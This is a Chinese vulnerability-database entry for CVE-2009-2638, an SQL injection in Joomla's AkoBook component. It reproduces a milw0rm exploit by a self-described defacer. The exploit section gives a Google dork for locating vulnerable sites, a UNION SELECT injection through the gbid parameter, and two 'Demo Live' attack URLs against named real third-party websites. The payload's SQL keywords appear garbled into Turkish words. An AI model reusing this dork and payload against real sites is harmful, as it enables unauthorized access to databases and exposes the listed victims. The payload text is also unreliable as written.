Konze AkoBook SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117935 漏洞类型 SQL注入
发布时间 2009-06-09 更新时间 2009-07-29
CVE编号 CVE-2009-2638 CNNVD-ID CNNVD-200907-399
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8911
https://cxsecurity.com/issue/WLB-2009070210
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-399
|漏洞详情
Joomla!AkoBook(com_akobook)component2.3存在SQL注入漏洞允许远程攻击者借助对index.php的回复操作中的gbid参数执行任意的SQL指令。
|漏洞EXP
Joomla Component com_akobook Vulnerability
----------------------------------------------------------------------
 ###################################################
 [+] Author        :  Ab1i
 [+] Email         :  ab1i_usta@hotmail.com
 [+] Dork  : inurl:index.php?option=com_akobook
 ###################################################
________________________________________________________
Example:
http://localHost/path/components/index.php?option=com_akobook&Itemid=36= ( SQL code )

Demo Live (1):
http://lesnyak.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliği%20+%20+1,2,3,4,5,6,7,8,9%20seçin%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
Demo Live (2):
http://www.prostatitunet.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliği%20+%20+1,2,3,4,5,6,7,8,9%20seçin%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
++++++++++++++++++++++++++++++++++++++++++++++++++
www.ayyildiz.org
Türk 'ün Türkten başka dostu yoktur . Sizde Türk siteleri Destek olun ....
Turkish Defacers Ab1i
Eno7 , The_Bekir , Bgh7 , m0sted , Beygazi . Ustalara Selam olsun :)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<name>AkoBook</name>
<creationDate>09.04.2006</creationDate>
<author>Melikyan Sergey aka SaD</author>
<copyright> This component is released under the GNU/GPL License.  </copyright>
<authorEmail>contact@saddo.ru</authorEmail>
<authorUrl>http://saddo.ru/</authorUrl>
<version>SE 2.3</version>

# milw0rm.com [2009-06-09]
|参考资料

来源:BID
名称:35268
链接:http://www.securityfocus.com/bid/35268
来源:MILW0RM
名称:8911
链接:http://www.milw0rm.com/exploits/8911